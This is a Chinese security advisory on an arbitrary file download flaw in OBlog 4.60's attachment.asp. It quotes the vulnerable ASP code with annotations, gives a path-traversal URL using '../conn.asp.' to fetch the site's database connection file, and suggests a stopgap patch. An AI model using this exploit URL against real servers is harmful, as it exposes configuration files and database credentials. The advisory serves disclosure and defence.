OBlog任意文件下载漏洞
作者:
OBlog任意文件下载漏洞
系统编号:BES2008053247
发布时间:2008-05-02
更新时间:2008-05-02
危害级别:★★★☆☆☆
受影响版本:
OBlog 4.60
描述:
attachment.asp代码
Path = Trim(Request("path")) '获取用户提交的路径
FileID = Trim(Request("FileID"))
If FileID ="" And Path = "" Then
Response.Write "参数不足"
Response.End
End If
...
If CheckDownLoad Or 1= 1Then
If Path = "" Then
set rs = Server.CreateObject("ADODB.RecordSet")
link_database
SQL = ("select file_path,userid,file_ext,ViewNum FROM oblog_upfile WHERE FileID = "&CLng(FileID))
rs.open sql,conn,1,3
If Not rs.Eof Then
uid = rs(1)
file_ext = rs(2)
rs("ViewNum") = rs("ViewNum") + 1
rs.Update
downloadFile Server.MapPath(rs(0)),0
Else
Response.Status=404
Response.Write "该附件不存在!"
End If
rs.Close
Set rs = Nothing
Else
If InStr(path,Oblog.CacheConfig(56)) > 0 Then 'Tr4c3 标注:注意这里,仅仅判断用户提交的路径是否包含UploadFiles,为真则调用downloadfile函数下载文件
downloadFile Server.MapPath(Path),1
End if
End If
Else
'如果附件为图片的话,当权限检验无法通过则调用一默认图片,防止<img>标记无法调用,影响显示效果
If Path = "" Then
Response.Status=403
Response.Write ShowDownErr
Response.End
Else
downloadFile Server.MapPath(blogdir&"images/oblog_powered.gif"),1
End if
End if
Set oblog = Nothing
Sub downloadFile(strFile,stype)
On Error Resume Next
Server.ScriptTimeOut=9999999
Dim S,fso,f,intFilelength,strFilename
strFilename = strFile
Response.Clear
Set s = Server.CreateObject(oblog.CacheCompont(2))
s.Open
s.Type = 1
Set fso = Server.CreateObject(oblog.CacheCompont(1))
If Not fso.FileExists(strFilename) Then
If stype = 0 Then
Response.Status=404
Response.Write "该附件已经被删除!"
Exit Sub
Else
strFilename = Server.MapPath(blogdir&"images/nopic.gif")
End if
End If
Set f = fso.GetFile(strFilename)
intFilelength = f.size
s.LoadFromFile(strFilename)
If Err Then
Response.Write("<h1>错误: </h1>" & Err.Description & "<p>")
Response.End
End If
Set fso=Nothing
Dim Data
Data=s.Read
s.Close
Set s=Nothing
Dim ContentType
select Case LCase(Right(strFile, 4))
Case ".asp",".mdb",".config",".js" 'Tr4c3 标注:再看这里,想起来什么来了?对了,前几天我发的沸腾展望新闻系统的任意下载漏洞跟这个检查的方法差不多[http://www.tr4c3.com /post/306.html],利用方法也相似,神奇的"."又派上用场了。
Exit Sub
Case ".asf"
ContentType = "video/x-ms-asf"
Case ".avi"
ContentType = "video/avi"
Case ".doc"
ContentType = "application/msword"
Case ".zip"
ContentType = "application/zip"
Case ".xls"
ContentType = "application/vnd.ms-excel"
Case ".gif"
ContentType = "image/gif"
Case ".jpg", "jpeg"
ContentType = "image/jpeg"
Case ".wav"
ContentType = "audio/wav"
Case ".mp3"
ContentType = "audio/mpeg3"
Case ".mpg", "mpeg"
ContentType = "video/mpeg"
Case ".rtf"
ContentType = "application/rtf"
Case ".htm", "html"
ContentType = "text/html"
Case ".txt"
ContentType = "text/plain"
Case Else
ContentType = "application/octet-stream"
End select
If Response.IsClientConnected Then
If Not (InStr(LCase(f.name),".gif")>0 Or InStr(LCase(f.name),".jpg")>0 Or InStr(LCase(f.name),".jpeg")>0 Or InStr(LCase(f.name),".bmp")>0 Or InStr(LCase(f.name),".png")>0 )Then
Response.AddHeader "Content-Disposition", "attachment; filename=" & f.name
End If
Response.AddHeader "Content-Length", intFilelength
Response.CharSet = "UTF-8"
Response.ContentType = ContentType
Response.BinaryWrite Data
Response.Flush
Response.Clear()
End If
End Sub
<* 参考:
Tr4c3[at]126[dot]com
*>
测试方法:
[警 告]
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用.风险自负!
########################################################################
利用方法:
http://www.target.com/attachment.asp?path=UploadFiles/../conn.asp.
########################################################################
建议:
修补建议:
等待官方发布新的补丁程序。
########################################################################
临时解决办法:
将attachment.asp第5行 Path = Trim(Request(”path”)) 改成 Path = Replace(Trim(Request(”path”)),”..”,”")
########################################################################